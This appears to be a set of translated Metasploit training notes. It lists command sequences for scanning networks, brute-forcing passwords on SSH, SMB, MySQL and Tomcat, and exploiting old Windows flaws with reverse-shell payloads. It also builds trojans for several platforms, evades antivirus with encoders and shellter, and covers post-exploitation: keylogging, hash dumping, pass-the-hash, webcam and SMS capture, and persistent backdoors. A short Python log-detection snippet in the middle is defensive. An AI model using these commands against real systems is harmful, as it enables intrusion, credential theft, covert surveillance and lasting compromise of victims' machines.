A buffer overflow means that more data is written into a buffer than it has the capacity to store, like pouring too much water into a cup.
More abstractly, a buffer can be understood as a memory area that is read and written over time;
the ultimate goal of the attack is to make the system read and execute malicious code that has been deliberately placed in this memory area.
Defenses against buffer overflows:
Use secure string-handling functions
Write secure code
Validate (filter) input data
Check pointer integrity
Third-party software defenses
Penetration attack (exploit)
The process by which a tester uses a vulnerability in a system, program or service to attack it
Attack load (payload)
The attacker's code that is executed on the target system: code that opens a reverse connection, creates a user, or runs other system commands
shellcode
A piece of machine code that runs on the target machine and returns a shell after successful execution
Module (Module)
A piece of software code used as a component in the Metasploit framework
Listener (listener)
The Metasploit component that waits for an incoming network connection
Start the database: service postgresql start
Check database status: service postgresql status
Run msfconsole
View the database connection status: db_connect
Create a workspace: workspace -a test
Delete a workspace: workspace -d test
Switch to the test workspace: workspace test
Scan a host with nmap: db_nmap -sS 192.168.80.1
Export scan results: db_export 1.xml
Import scan results: db_import 1.xml
View scan results: hosts
Information gathering
Open msfconsole
- whois www.example.com
- nslookup
use auxiliary/scanner/ip/ipidseq    # IPID sequence scanner, similar to the nmap -O / -sI options
show options
set RHOSTS 192.168.1.0/24
set RPORT 8080
set THREADS 50
run
nmap scanning through the database connection
db_nmap -sS -A 192.168.2.123
db_services    view scan results
Using the portscan module
search portscan
use auxiliary/scanner/portscan/syn
set RHOSTS 192.168.1.111
set THREADS 50
run
smb_version scanning module:
use auxiliary/scanner/smb/smb_version    find IPs with port 445 open
show options
set RHOSTS 192.168.1.111
set THREADS 50
run
db_hosts -c address,os_flavor
Find MSSQL hosts
use auxiliary/scanner/mssql/mssql_ping
show options
set RHOSTS 192.168.1.0/24
set THREADS 255
run
Search a site for e-mail addresses
search_email_collector
use auxiliary/gather/search_email_collector
set DOMAIN cracer.com    (domain to scan)
run
Scan for SSH servers
use auxiliary/scanner/ssh/ssh_version
set RHOSTS 192.168.1.0/24
set THREADS 50
run
Telnet service
use auxiliary/scanner/telnet/telnet_version
set RHOSTS 192.168.1.0/24
set THREADS 50
run
Scan for FTP hosts
use auxiliary/scanner/ftp/ftp_version
show options
set RHOSTS 192.168.1.0/24
set THREADS 50
run
Scan for anonymous FTP logins
use auxiliary/scanner/ftp/anonymous
show options
set RHOSTS 192.168.1.0/24
set THREADS 50
run
Anonymous FTP login
Login name: anonymous
Password: empty
Scan the local network for live hosts
use auxiliary/scanner/discovery/arp_sweep
show options
set RHOSTS 192.168.1.0/24
set THREADS 50
run
Scan web directories (does not scan files)
use auxiliary/scanner/http/dir_scanner
show options
set RHOSTS 192.168.1.129
set THREADS 50
run
Scan SNMP hosts
use auxiliary/scanner/snmp/snmp_login
show options
set RHOSTS 192.168.1.0/24
set THREADS 50
run
Sniffer
use auxiliary/sniffer/psnuffle
run
Password brute-forcing
SSH password
search ssh_login
use auxiliary/scanner/ssh/ssh_login
show options
set RHOSTS 192.168.2.231
set PASS_FILE pass
set USERNAME root
exploit
Telnet password
search telnet_login
use auxiliary/scanner/telnet/telnet_login
show options
set RHOSTS 192.168.2.123
set FILE_PATH pass
set USERNAME administrator
exploit
Samba attack
use auxiliary/scanner/smb/smb_login
set RHOSTS 192.168.2.3
set PASS_FILE pass
set SMBUser administrator
set THREADS 50
exploit
MySQL password brute-force
search mysql_login
use auxiliary/scanner/mysql/mysql_login
set RHOSTS 192.168.1.32
set PASS_FILE pass
set USERNAME root
set THREADS 50
exploit
search postgresql_login
use auxiliary/scanner/postgres/postgres_login
show options
set RHOSTS 192.168.2.129
set PASS_FILE pass
set USERNAME postgres
exploit
Tomcat attack
search tomcat_mgr_login
use auxiliary/scanner/http/tomcat_mgr_login
show options
set RHOSTS 192.168.1.23
set PASS_FILE /root/pass.txt
set USER_FILE /root/user.txt
exploit
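The scanning modules (portscan/syn, the *_version scanners, db_nmap) and the *_login modules above leave a characteristic trace on the target side: one source touching many ports within a few seconds, or one source producing a burst of failed logins. The following Python is an added example (not part of the original notes) showing how a defender picks out both patterns with a sliding-window count; the firewall and sshd log lines are constructed samples and the thresholds are assumptions:

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
# Constructed sample logs (not real captures): firewall SYN log + sshd auth.log.
FW_LOG = """\
2024-05-01T10:00:00 SYN src=10.0.0.5 dst=10.0.0.20 dport=22
2024-05-01T10:00:00 SYN src=10.0.0.5 dst=10.0.0.20 dport=80
2024-05-01T10:00:01 SYN src=10.0.0.5 dst=10.0.0.20 dport=445
2024-05-01T10:00:02 SYN src=10.0.0.5 dst=10.0.0.20 dport=3389
2024-05-01T10:05:00 SYN src=10.0.0.9 dst=10.0.0.20 dport=443
"""
AUTH_LOG = """\
May  1 10:01:00 host sshd[1]: Failed password for root from 10.0.0.7 port 50001 ssh2
May  1 10:01:01 host sshd[1]: Failed password for root from 10.0.0.7 port 50002 ssh2
May  1 10:01:02 host sshd[1]: Failed password for root from 10.0.0.7 port 50003 ssh2
May  1 10:01:03 host sshd[1]: Failed password for root from 10.0.0.7 port 50004 ssh2
May  1 10:30:00 host sshd[1]: Failed password for bob from 10.0.0.8 port 50005 ssh2
"""
FW_RE = re.compile(r"^(\S+) SYN src=(\S+) dst=\S+ dport=(\d+)")
AUTH_RE = re.compile(r"^(\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
                     r"Failed password for \S+ from (\S+)")

def window_alerts(events, threshold, window, distinct):
    """events: (timestamp, source, item).  Returns {source: peak count} for sources
    whose item count (distinct items if `distinct`) in any sliding window >= threshold."""
    by_src = defaultdict(list)
    for ts, src, item in events:
        by_src[src].append((ts, item))
    alerts = {}
    for src, evs in by_src.items():
        evs.sort()          # logs may not be strictly chronological
        lo = 0
        for hi in range(len(evs)):
            while evs[hi][0] - evs[lo][0] > window:   # slide window start forward
                lo += 1
            items = [item for _, item in evs[lo:hi + 1]]
            n = len(set(items)) if distinct else len(items)
            if n >= threshold:
                alerts[src] = max(n, alerts.get(src, 0))
    return alerts

def port_scan_sources(log=FW_LOG, threshold=4, window=timedelta(seconds=10)):
    """Sources touching >= threshold distinct ports inside the window (SYN scan)."""
    events = [(datetime.fromisoformat(m[1]), m[2], int(m[3]))
              for m in map(FW_RE.match, log.splitlines()) if m]
    return window_alerts(events, threshold, window, distinct=True)

def brute_force_sources(log=AUTH_LOG, threshold=4, window=timedelta(seconds=60)):
    """Sources with >= threshold failed logins inside the window (password guessing)."""
    events = [(datetime.strptime("2024 " + m[1], "%Y %b %d %H:%M:%S"), m[2], "fail")
              for m in map(AUTH_RE.match, log.splitlines()) if m]
    return window_alerts(events, threshold, window, distinct=False)
```

The thresholds and window sizes should be tuned to the environment; a monitoring host that legitimately probes many ports would otherwise trip the scan rule.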
Exploit module
show targets    display the targets (OS versions)
set TARGET    set the target version
exploit    start attacking the vulnerability
sessions -l    list sessions
sessions -i    select a session
sessions -k    end a session
z    put the session in the background
c    end the session
show auxiliary    display auxiliary modules
use    use a module
set    set options
run    run the module
ms10_002
search ms10_002
use exploit/windows/browser/ms10_002_aurora
show options
set SRVHOST 192.168.2.128    (IP used to generate the malicious URL; can be proxied)
set payload windows/meterpreter/reverse_tcp    (reverse shell)
set SRVPORT 80    (port to bounce back to)
set URIPATH /
set LHOST 192.168.2.128    (listening address)
set LPORT 1211    (listening port)
exploit
sessions -i    (check whether there is a session)
sessions -i 1    (select an ID to enter the session)
Enter shell directly to obtain a shell
ms10_018
search ms10_018
use exploit/windows/browser/ms10_018_ie_behaviors
show options
set SRVHOST 192.168.2.128
set SRVPORT 8081
set payload windows/shell/reverse_tcp
set LHOST 192.168.2.128
set LPORT 1211
exploit
sessions -i    (check whether there is a session)
sessions -i 1    (select an ID to enter the session)
Because the payload is different, this drops directly into a shell
ms12_020
search ms12_020
use auxiliary/scanner/rdp/ms12_020_check    (check for the ms12_020 vulnerability)
show options
set RHOSTS 192.168.2.0/24
set THREADS 50
back
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
show options
set RHOST 192.168.2.132
run
ms10_046
search ms10_046
use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
show options
set SRVHOST 192.168.2.128
set payload windows/shell/reverse_tcp
set LHOST 192.168.2.128
set LPORT 1213
exploit
ms08_067
search ms08_067
use exploit/windows/smb/ms08_067_netapi
show options
set RHOST 192.168.2.131
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.2.128
set LPORT 1215
show targets
set target 34
exploit
shellcode
windows
Generate shellcode
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.2.133 LPORT=1121 X > /root/cracer.exe
Listen for the shellcode
msf
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.2.133    (address must match)
set LPORT 1121
Upload the generated shellcode to the target machine
exploit
linux
Generate shellcode
msfpayload linux/x86/meterpreter/reverse_tcp LHOST=192.168.2.133 LPORT=1121 X > /root/cracer
Listen for the shellcode
msf
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.2.133    (address must match)
set LPORT 1121
Upload the generated shellcode to the target machine
exploit
android
Generate shellcode
msfpayload android/meterpreter/reverse_tcp LHOST=192.168.2.133 LPORT=1121 X > /root/Desktop/cracer.apk
Listen for the shellcode
msf
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.2.133    (address must match)
set LPORT 1121
Upload the generated shellcode to the target machine
exploit
dump_contacts    export contacts
dump_sms    export SMS messages
webcam_list    number of cameras
-i 1    rear camera
webcam_snap    take a photo
webcam_stream    start the camera stream
java
Generate shellcode
msfpayload java/meterpreter/reverse_tcp LHOST=192.168.2.133 LPORT=1125 X > /root/Desktop/cracer.jar
Listen for the shellcode
msf
use exploit/multi/handler
set payload java/meterpreter/reverse_tcp
set LHOST 192.168.2.133    (address must match)
set LPORT 1125
Upload the generated shellcode to the target machine
exploit
Run the generated cracer.jar:
java -jar cracer.jar
php
Generate shellcode
msfpayload php/meterpreter/reverse_tcp LHOST=192.168.2.133 LPORT=1121 R > cracer.php
Listen for the shellcode
msf
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST 192.168.2.133    (address must match)
set LPORT 1121
Upload the generated shellcode to the target machine
exploit
Shellcode AV evasion
Evasion using multiple encodings
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.2.133 LPORT=1211 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/alpha_upper -c 2 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/countdown -c 5 -t exe -o /root/cc.exe
Evasion using a packer
upx -5 cc.exe
Evasion with veil
Evasion with the shellter tool
Shellcode injection tool
It injects into some normal program that has a few holes in it, to achieve evasion
- First, generate the Metasploit payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=1337 -e x86/shikata_ga_nai -i 43 -f raw -o fud.raw
- Run shellter with wine: wine shellter.exe
- A stands for automatic mode; PE target is the location of the exe file we prepared for injection
- Enter L to choose the payload to load; here we use meterpreter_reverse_tcp, input 1
- Enter the address of our reverse shell, then the local port we need to listen on; here I chose 1355 as the listening port; press enter to generate
- Start the Metasploit listener
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.3
set lport 1355
exploit
- After the listener starts, place the generated file on the target Windows computer and run it
Post-exploitation
1. Create a trojan
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.2.133 LPORT=1121 X > /root/cracer.exe
2. Listen
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.2.133
set LPORT 1233
exploit
Run the trojan on the target machine
- Operation commands
screenshot    capture the screen; the picture is saved in the home folder
sysinfo    get the system platform
Keylogger
keyscan_start    start
keyscan_dump    output
keyscan_stop    stop
ps    view processes
migrate 1774    migrate to another process (after a successful compromise, the first thing to do on the target is migrate to a stable process, so that control is kept even if the program is closed)
run post/windows/capture/keylog_recorder    record keystrokes
Get hashes ---- hashdump
Log in using the hash
use exploit/windows/smb/psexec
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.2.133
set RHOST 192.168.2.131    (target)
show options
set LPORT 1212
set SMBUser Administrator    the SMBUser and SMBPass values come from the dumped hash
set SMBPass asdasdqwsda1313
show options
exploit
Process migration: run post/windows/manage/migrate    (migrate to a stable process automatically)
run killav    close cmd.exe
View all target traffic: run packetrecorder -i 1
Extract system information: run scraper
Persistent control of a PC (autostart at boot)
run persistence -X -i 50 -p 1121 -r 192.168.2.133    (writes some registry data on the target)
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LPORT 1121
set LHOST 192.168.2.133
exploit
sessions -u 2    upgrade the shell to meterpreter
Permanent control of the server
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.2.133 LPORT=1127 X > /root/cracer.exe
Give the generated payload to the target machine
msfconsole
use exploit/multi/handler
set payload windows/metsvc_bind_tcp
set LPORT 1121
set LHOST 192.168.2.133
exploit
Run the payload
run metsvc -A    // install the backdoor permanently
After the restart
msfconsole
use exploit/multi/handler
set payload windows/metsvc_bind_tcp
set RHOST 192.168.2.132
set LPORT 31337    // fixed port
exploit